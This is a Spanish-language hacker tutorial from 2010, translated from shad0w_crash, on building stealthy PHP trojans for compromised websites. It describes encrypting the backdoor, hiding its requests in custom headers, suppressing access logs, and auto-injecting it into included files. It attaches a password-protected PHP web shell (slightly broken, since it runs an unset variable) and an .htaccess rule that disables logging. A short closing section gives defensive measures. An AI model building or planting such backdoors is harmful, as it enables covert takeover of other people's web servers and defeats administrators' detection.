|=--------------------------------------------------------------------------------------------------=|
|=---------------------------=[Introducción a los troyanos en php]=---------------------------------=|
|=-------------------------------------=[ 28 enero 2010 ]=------------------------------------------=|
|=----------------------------------=[  Por shad0w_crash  ]=----------------------------------------=|
|=---------------------------------=[  Traducido por seth  ]=---------------------------------------=|
|=--------------------------------------------------------------------------------------------------=|


Indice

1) Introducción
2) Suposiciones
3) Encriptación del código
4) Ocultamiento de la petición
5) Inyección
6) Medidas
7) Contacto

Adjunto 1: Troyano sencillo en php
Adjunto 2: .htaccess

---------------------------------------------------------------------------------------------------------
1. Introducción

Este es mi segundo tutorial asi que sentite libre de enviarme comentarios. El objetivo de este texto es proveer un poco de teoria sobre la creación de troyanos en lenguajes de scripting (en este caso php). No todos los ejemplos están completamente discutidos, así que hay lugar para el debate.
Todo el tema de escribir troyanos es un gran tabú, espero que escribiendo este documento pueda haber un poco de discusión. No quiero quiero que los sitios web sean infectados por troyanos, por eso escribí un montón en pseudo código y no hice una versión que funcione (por favor, no hagas una).

---------------------------------------------------------------------------------------------------------
2. Suposiciones

Para lograr un troyano en php menos detectable, tenemos algunas dificultades:

* Cuando accedés a el, la petición aparece en los archivos de log.
* Cuando aparece un archivo adicional en el directorio web, puede a ser detectado por alguien.
* Cuando agregás código a un index, lo puede ver un programador.
* Cuando agregás código a un index, este va a ser sobreescrito en la proxima actualización.

Este texto no va a solucionar todos esos problemas. Para dar una mejor visión general hice algunas suposiciones:

* Cuando se actualiza una aplicación web y todos los archivos son reemplazados, probablemente se den cuenta de que algo le pasó al código y tu troyano no va a durar mucho tiempo. Para hacer mejores troyanos, no tenes que estar en este nivel del sistema operativo.
* Si el webmaster calcula los hashes de los archivos y los compara periódicamente, los métodos descriptos no van a funcionar (se que se puede solucionar encontrando colisiones pero eso es muy complicado).
* El webmaster no puede crackear (T)DES, GOST, AES, etc.

---------------------------------------------------------------------------------------------------------
3. Encriptación del código

Para crear un troyano en PHP dificil de detectar, necesitamos tener uno que funcione para usarlo de base (ver adjunto 1). El funcionamiento de este troyano menos detectable es encriptando el original. El código encriptado es guardado en una función (desde ahora la vamos a llamar f1) que:

1) Desencripta el archivo y lo pone en un .php con nombre aleatorio.
2) Envia la petición original a ese archivo temporal.
3) Elimina el archivo.

Con esto solucionamos algunos problemas. El programador no conoce y no puede conocer que hace la función. Tampoco lo van a hacer las herramientas que analizan el código, porque la unica forma es desencriptando la cadena, con la contraseña. También f1 puede ser insertado en index.php, indicando que la función solo debe ser ejecutada si una variable específica está activada (si no, todas las peticiones al archivo invocarian al troyano).

El mejor lugar para poner esta función son archivos como newsletter.php y login.php, ya que los archivos de librerias y el index son actualizados frecuentemente.

---------------------------------------------------------------------------------------------------------
4. Ocultamiento de la petición

Un desafio que quedó, es evitar que todas las peticiones aparescan en los logs. Voy a diferenciar dos peticiones, la primera es al archivo que contiene f1 y la segunda es la que f1 le hace al archivo temporal desencriptado.

Cuando ves una petición http normal hay mucha mas información que solo el GET o el POST. Pueden ser usadas un monton de cabeceras como Accept-Language, User-Agent, etc [1]. Usando getallheaders() podes verlas todas. Tenemos dos opciones:
* Extender nuestra petición con un nuevo valor (violando el RFC, pero con menos chances de que aparesca en los logs.
* Usar un valor elejido para algo en el RFC (y abusarlo, entonces hay mas chances de que un IDS lo detecte)

La función ahora puede obtener sus variables para autentificarse y ejecutar el proceso interno.
** ADVERTENCIA ** esto es seguridad por oscuridad. Es posible sniffear y repetir el ataque. Incluso cuando el servidor usa ssl, hay posibilidades de que el administrador haya puesto una herramienta que lo registre. Entonces, el podria repetir el ataque y darse cuenta de que hay un troyano.
Para evitar esto tenemos que enviar una variable extra al servidor un nuevo hash sha512 que reemplace al anterior. Así seria imposible repetir el ataque porque la contraseña funciona una sola vez.
La segunda petición es mas facil de esconder, para eso vamos a extender f1:
1) Crea un directorio con nombre aleatorio.
2) Escribe el .htaccess en ese directorio.
3) Desencripta el troyano en un archivo temporal con nombre aleatorio, en el directorio anterior.
4) Envia la petición original al archivo temporal.
5a) Elimina el archivo temporal
5b) Elimina el .htaccess
5c) elimina el directorio
De esta forma, no van a quear rastros en el log de acceso.

---------------------------------------------------------------------------------------------------------
5. Inyección

Ahora que sabemos como esconder el troyano y como ocultarlo (lo mas posible), necesitamos un lugar para guardarlo. Al principio mencioné que puede estar en index.php o algun archivo similar, pero hay formas mas eficientes. Vamos a crear un script que haga lo siguiente:

1) Buscar una llamada a la función include()
2a) Tomar aleatoriamente dos archivos de los que se incluyen
2b) Si no se encuentran, se trabaja sobre el archivo actual
3) Buscar en el archivo variables de f1
4a) Si no coincide, insertar f1
4b) Si coincide, reemplazar variables en f1 y despues insertar la función

---------------------------------------------------------------------------------------------------------
6. Medidas

Lo mejor que podes hacer para no ser infectado por un troyano web es mantener el software actualizado. Cuando tu sitio no es explotable, hay menos posibilidades de ser infectado. También, podes crear una lista con hashes de los archivos, guardarla en una computadora remota y compararlos periódicamente. De esta forma te vas a enterar de los cambios en los archivos.
---------------------------------------------------------------------------------------------------------
7. Contacto
Si tenes algo que añadir, simplemente copiá el texto y envialo al sitio de donde lo sacaste. Para contactarme: http://twitter.com/shad0w_crash (NdT: el habla en inglés, para contactarme a mi http://elrincondeseth.wordpress.com/ o "xd punto seth ar@ro@ba gmail p.u.n.t.o com")

---------------------------------------------------------------------------------------------------------
Attach 1: Most easy PHP trojan.

Adjunto 1: Troyano sencillo en PHP.
<?php
error_reporting(0);
$action = $_GET['cmd'];
$pw = $_GET['pw'];
$password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
/* Remove this line!, password= Hasdf4g */
if( hash('sha512',$pw) == $password)
{
	echo system($cmd);
}
?>


---------------------------------------------------------------------------------------------------------
Attach 2: .Htaccess.

Adjunto 2: .htaccess.

SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
<Limit GET POST HEAD>
order deny,allow
deny from all
allow from 127.0.0.1 (or the remote ip of the server).
</Limit>

La primer regla evita los logs de acceso para el archivo.
La segunda solo permite peticiones por el servidor mismo.


[1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html